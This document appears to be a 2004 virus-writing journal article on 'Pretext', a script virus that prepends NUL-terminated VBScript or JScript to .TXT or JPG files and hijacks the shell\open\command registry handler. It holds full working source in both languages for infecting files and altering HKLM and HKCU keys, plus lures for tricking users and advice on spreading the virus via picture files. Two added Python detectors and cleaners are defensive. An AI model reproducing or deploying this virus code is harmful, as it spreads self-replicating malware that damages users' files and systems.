Abstract 

Executable files are, obviously, directly executable. This 
also means that code added to these files can be executed 
directly. Can the same thing be done for data files? Not as 
they are; that is why they are called data files. 

However, what can be done is to change the environment 
so that data files are treated as executable files. Then code 
can be added to these files and executed directly. 
I. First attempt 

Let us decide to infect .TXT files. We can change the 
environment to run .TXT files as executable binaries by 
dropping an additional executable binary and changing the 
registry (the shell\open\command handler for the .TXT file 
type) so that Windows runs this file instead of the usual 
viewer. The dropped file then calls WinExec() to run the 
.TXT file as executable binary code. There is a serious 
problem with this method: files that are not infected are 
not valid executables, so the computer crashes (or at best 
the open fails) when their text is run as binary code. 

II. Second attempt 

We must use a different type of code and a different way 
to run it. The code type is text, and the way to run it 
is as a .BAT file or as *Script (VBScript or JScript). 
.BAT is ruled out immediately because of its 64 KB limit, 
so the answer is *Script. 

If we prepend a script to .TXT files, then we can change 
the environment to run them through the Windows Scripting 
Host, with no need for an additional file. What about 
clean files? They are still a problem, but now the problem 
is different. If we try to open a clean file, the computer 
will not crash, but the clean file will no longer be 
displayed. Only infected files can be displayed. Also, 
new files cannot be created and existing files cannot be 
altered through the normal handler. 

III. Third attempt 

We can solve this problem by using the additional file 
again. The additional file can be a binary, a .BAT or a 
*Script file. It uses the Windows Scripting Host to try 
to run the .TXT file as a script, and then displays the 
file as usual with the original handler. All of those 
problems are solved. If the file is infected, then our code 
cleans the host so it displays correctly. If the file is 
already clean, then it also displays correctly. The 
technique can be applied to any file type with only a few 
changes to the code. Only one problem remains: how can 
we prepend a script to any other file without causing 
scripting errors? 
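The environment change described in this section, a rewritten shell\open\command handler (and, as the code later in the article notes, a copy under HKCU, which Windows consults before HKLM), is also the most durable indicator a responder has. Below is an added example, not code from the article: a small Python checker that parses the text written by regedit or `reg export` (a constructed sample is embedded) and flags a ProgId whose open command no longer runs the expected viewer or has been shadowed by a per-user copy. The expected-viewer table (txtfile and inifile opened by notepad.exe) and the sample key values are assumptions for the demo; take them from a known-good machine of the same build.

```python
"""Flag hijacked shell\\open\\command handlers in a regedit export.

Added example (not the article's code). It reads the text format written
by regedit / `reg export`, collects the default (@) value of every
...\\shell\\open\\command key under Software\\Classes, and reports
handlers that no longer run the expected viewer, or that exist under
HKCU, where they take precedence over the HKLM copy.
Real exports are UTF-16 with a BOM: open them with encoding="utf-16".
Expandable strings (hex(2):...) are not decoded here.
"""
import re

KEY_RE = re.compile(r"^\[(?P<hive>HKEY_[A-Z_]+)\\(?P<path>[^\]]+)\]$")
DEFAULT_RE = re.compile(r'^@="(?P<value>.*)"$')
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "cscript", "wscript"}
SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")

# Expected viewer per ProgId: an assumption for the demo.
EXPECTED = {"txtfile": "notepad.exe", "inifile": "notepad.exe"}

# Constructed sample export: txtfile hijacked the way the article does it
# (HKLM rewritten, HKCU copy added); inifile left intact for contrast.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command]
@="pretext.bat %1"

[HKEY_CURRENT_USER\Software\Classes\txtfile\shell\open\command]
@="pretext.bat %1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command]
@="%SystemRoot%\\system32\\NOTEPAD.EXE %1"
"""


def unescape(value):
    """Undo regedit's string escaping: \\\\ becomes \\ and \\" becomes "."""
    return re.sub(r"\\(.)", r"\1", value)


def parse_reg_export(text):
    """Map (hive, key path lower-cased) -> default value, for keys that set one."""
    defaults, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = (m.group("hive"), m.group("path").lower())
            continue
        m = DEFAULT_RE.match(line)
        if m and current:
            defaults[current] = unescape(m.group("value"))
    return defaults


def first_token(command):
    """The program part of a command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(None, 1)[0] if command else ""


def classify(command, expected_exe):
    """'ok', 'script-wrapper' (batch/script host in front of the viewer) or 'unexpected'."""
    base = first_token(command).lower().rsplit("\\", 1)[-1]
    if base == expected_exe.lower():
        return "ok"
    if base in SCRIPT_HOSTS or base.endswith(SCRIPT_EXTS):
        return "script-wrapper"
    return "unexpected"


def audit(text, expected=EXPECTED):
    """Sorted (progid, hive, reason, command) findings for one export."""
    findings = []
    for (hive, path), command in parse_reg_export(text).items():
        parts = path.split("\\")
        if parts[:2] != ["software", "classes"] or parts[3:] != ["shell", "open", "command"]:
            continue
        progid = parts[2]
        if progid not in expected:
            continue
        verdict = classify(command, expected[progid])
        if verdict != "ok":
            findings.append((progid, hive, verdict, command))
        if hive == "HKEY_CURRENT_USER":
            # Per-user Classes shadow the machine-wide ones, so a user-level
            # copy of a system ProgId handler is itself worth a look.
            findings.append((progid, hive, "hkcu-override", command))
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit(SAMPLE_REG):
        print("%-8s %-18s %-15s %s" % finding)
```

A bare `pretext.bat %1` with no directory is resolved through the PATH, which is how the dropped file in %windir% gets picked up; any handler whose program is an unqualified name deserves the same suspicion as one pointing at a script host.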
IV. Final attempt 

The solution to this problem is what I call "tar-script". 
:) Microsoft's scripting engines calculate the length of a 
script with the strlen() function, i.e. they treat the script 
source as a NUL-terminated C string. When a 0 byte is found, 
nothing after it is examined, so if our script ends with a 
0 byte we can append anything to it and no scripting errors 
will occur. This is an observed property of the engines of 
the time, not a documented interface, so it must be 
re-checked against the engine version actually targeted. 

The prepending technique is unique because even if our 
additional file is deleted, our code can still be run from 
the data files; it only requires the user's help. If the user 
runs the file through WSH, or renames the extension to that 
of the scripting language we use, then we become a virus 
again. To encourage this, place a comment on the first line: 

"This is config file. Run cscript filename //e:xxx to 
configure your system", replacing xxx with "vbs" or 
"jscript" depending on the language. ;) 

But what happens if the clean file already contains a viral 
script? Heh, it runs. 
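The layout this section fixes (script text, one 0 byte, then the untouched host, with the first byte of the script doubling as the infection marker) is exactly what a cleaner has to recognise. The following is an added example, not the article's code: a Python checker that detects that layout on any file type regardless of extension, which is the generalisation the article itself claims, and recovers the host. The constructed samples use a harmless two-line stand-in for the script, and the "must instantiate a COM object" test used to separate a real script prefix from an ordinary file that merely starts with ' or / is an assumption of this demo.

```python
"""Detect and strip a Pretext-style prepended script ("tar-script").

Added example (not the article's code). Layout recognised:
    <script text> <0x00> <original host bytes>
where the first byte of the script (' for VBScript, / for JScript) is the
infection marker the article's code tests. Works on any file type.
"""
from pathlib import Path

MARKERS = {b"'": "vbs", b"/": "jscript"}          # first byte -> WSH engine
HINTS = (b"createobject(", b"activexobject(")      # assumption: a real prefix instantiates a COM object


def split_prepended_script(data):
    """Return (engine, script, host) if data is script + NUL + host, else None."""
    marker = data[:1]
    if marker not in MARKERS:
        return None
    nul = data.find(b"\x00")
    if nul < 0:
        return None                    # no terminator: plain text that starts with ' or /
    script = data[:nul]
    if not any(h in script.lower() for h in HINTS):
        return None                    # a NUL inside some other file, not a script prefix
    return MARKERS[marker], script, data[nul + 1:]


def clean(data):
    """The host as it was before infection (unchanged if nothing was prepended)."""
    found = split_prepended_script(data)
    return found[2] if found else data


def scan(directory, suffixes=(".txt", ".jpg")):
    """Yield (path, engine) for every file under directory carrying a prepended script."""
    for path in Path(directory).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = split_prepended_script(path.read_bytes())
            if found:
                yield path, found[0]


# Constructed samples. The "script" is a harmless stand-in that only shares
# the shape of the article's payload (marker byte, object creation, NUL).
HOST = b"Hello, world.\r\nJust a text file.\r\n"
STUB_VBS = b"'demo\r\nset a=createobject(\"scripting.filesystemobject\")\r\n"
STUB_JS = b"//demo\r\na=new ActiveXObject(\"scripting.filesystemobject\")\r\n"
INFECTED_VBS = STUB_VBS + b"\x00" + HOST
INFECTED_JS = STUB_JS + b"\x00" + HOST
JPEG_LIKE = b"\xff\xd8\xff\xe0" + b"\x00" * 4 + b"JFIF"   # binary with NULs, no marker byte

if __name__ == "__main__":
    for name, blob in [("vbs host", INFECTED_VBS), ("js host", INFECTED_JS),
                       ("clean text", HOST), ("jpeg-like", JPEG_LIKE)]:
        found = split_prepended_script(blob)
        print(name, "->", found[0] if found else "clean", "|", len(clean(blob)), "bytes after cleaning")
```

Because the check keys on the script prefix and the 0 byte rather than on the extension, the same routine covers the JPG variant described in the conclusions; only the suffix list handed to `scan()` changes.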

Let's see the code. It requires WSH 5.1 or later because we 
must specify the engine to use (the //E: switch). The 
listings follow the conclusions: the VBScript version first, 
then the JScript version. 

V. Conclusions 

Now let us decide to infect JPG files instead of .TXT 
files. How? Simply change the extension check from "txt" 
to "jpg" and change the registry key from 'txtfile' to 
'jpegfile'. We must also increase the code-size constant 
by 1 byte because 'jpegfile' is 1 byte longer than 'txtfile'. 
That's all. We infect JPG files, we replicate from JPG 
files, and they still display on an infected computer. 
Make a dropper by renaming the extension to that of the 
script engine; after running it, rename it back to .JPG. 
So now you can infect people by sending them a picture 
file. 
'Pretext - roy g biv 24/06/02 
'no dim needed for local variables 
set a=createobject("scripting.filesystemobject") 
b=wscript.scriptfullname 
on error resume next 
set c=a.opentextfile(b)           'open host 
d=c.read(996)                     'read virus code. 996 is size of virus with no 
                                  'comments or spaces 
set e=a.getfile(b)                'get our file object 
f=c.read(e.size-996)              'read rest of host file 
                                  'if you change the size of code, then you must 
                                  'change both of these values 
c=e.attributes                    'save attributes 
e.attributes=0                    'remove any read-only attribute 
set g=a.opentextfile(b,2)         'open host for writing 
if err.number=0 then 
g.write f                         'restore host, is world's first full stealth 
                                  'script virus? ;) 
end if 
e.attributes=c                    'restore attributes 
set c=a.getfolder(".")            'demo version, current directory only 
for each e in c.files 
if b<>e and lcase(a.getextensionname(e))="txt" then 
                                  'this can be changed to any extension 
                                  'and see below for registry key to change 
err=0 
set f=a.opentextfile(e,1)         'open potential victim 
if err.number=0 then 
g=f.read(1)                       'read first character 
if g<>"'" then                    'check for infection marker 
h=f.readall                       'read entire file 
i=e.attributes                    'save attributes 
e.attributes=0                    'remove any read-only attribute 
err=0 
set j=a.opentextfile(e,2)         'open file for writing 
if err.number=0 then 
j.write d+g+h                     'prepend to file 
j.close                           'close file (write mode) 
end if 
e.attributes=i                    'restore attributes 
end if 
f.close                           'close file (read mode) 
end if 
end if 
next 
set b=createobject("wscript.shell") 
c="HKLM" 
d="\software\classes\txtfile\shell\open\command\" 
e=b.regread(c+d)                  'read current handler 
f="pretext.bat" 
g=f+" %1" 
if e<>g then                      'check for infected environment 
h=a.getspecialfolder(0)           '%windir% 
if right(h,1)<>"\" then 
h=h+"\"                           'add \ if required 
end if 
a.opentextfile(h+f,2,1).write "@cscript %1 //e:vbs //b //nologo"+vbcr+vblf+"@"+e 
                                  'create and write our additional file in %windir% 
                                  'more stealth: original handler will be used to 
                                  'display file 
b.regwrite c+d,g                  'alter registry to infect environment 
b.regwrite "HKCU"+d,g             'Windows 2000/XP look in HKCU before HKLM 
                                  'so we alter that key, too 
end if 
'a single 0 byte terminates the script here; the host file follows 
Now the JScript version. 

//Pretext - roy g biv 24/06/02 
a=new ActiveXObject("scripting.filesystemobject") 
try 
{ 
c=a.opentextfile(b=WScript.scriptfullname)      //open host 
d=c.read(944)                                   //read virus code. 944 is size of virus with no 
                                                //comments or spaces 
e=a.getfile(b)                                  //get our file object 
f=c.read(e.size-944)                            //read rest of host file 
                                                //if you change the size of code, then you must 
                                                //change both of these values 
c=e.attributes                                  //save attributes 
e.attributes=0                                  //remove any read-only attribute 
a.opentextfile(b,2).write(f)                    //open and write host 
                                                //if VBS version is first full stealth script 
                                                //then this is second ;) 
e.attributes=c                                  //restore attributes 
} 
catch(z) 
{ 
} 
for(c=new Enumerator(a.getfolder(".").files);!c.atEnd();c.moveNext()) 
                                                //demo version, current directory only 
{ 
e=c.item() 
if(b!=e&&a.getextensionname(e).toLowerCase()=="txt") 
                                                //this can be changed to any extension 
                                                //and see below for registry key to change 
try 
{ 
f=a.opentextfile(e,1)                           //open potential victim 
g=f.read(1)                                     //read first character, keep for later 
if(g!="/")                                      //check for infection marker 
try 
{ 
h=f.readall()                                   //read entire file 
i=e.attributes                                  //save attributes 
e.attributes=0                                  //remove any read-only attribute 
j=a.opentextfile(e,2)                           //open file for writing 
j.write(d+g+h)                                  //prepend to file, append first character and host 
j.close()                                       //close file (write mode) 
e.attributes=i                                  //restore attributes 
} 
catch(z) 
{ 
} 
f.close()                                       //close file (read mode) 
} 
catch(z) 
{ 
} 
} 
b=new ActiveXObject("wscript.shell") 
c="HKLM" 
d="\\software\\classes\\txtfile\\shell\\open\\command\\" 
e=b.regread(c+d)                                //read current handler 
f="pretext.bat" 
g=f+" %1" 
if(e!=g)                                        //check for infected environment 
{ 
h=a.getabsolutepathname(a.getspecialfolder(0))  //%windir% 
if(h.charAt(h.length-1)!="\\") 
h+="\\"                                         //add \ if required 
a.opentextfile(h+f,2,1).write("@cscript %1 //e:jscript //b //nologo\r\n@"+e) 
                                                //create and write our additional file in %windir% 
                                                //more stealth: original handler will be used 
                                                //to display file 
b.regwrite(c+d,g)                               //alter registry to infect environment 
b.regwrite("HKCU"+d,g)                          //Windows 2000/XP look in HKCU before HKLM 
                                                //so we alter that key, too 
} 
<0 here>                                        //a single 0 byte terminates the script; the host file follows 






Copyright © 2004 and published by the CodeBreakers-Journal. Single print or electronic copies for personal use only are permitted. 
Reproduction and distribution without permission is prohibited. 



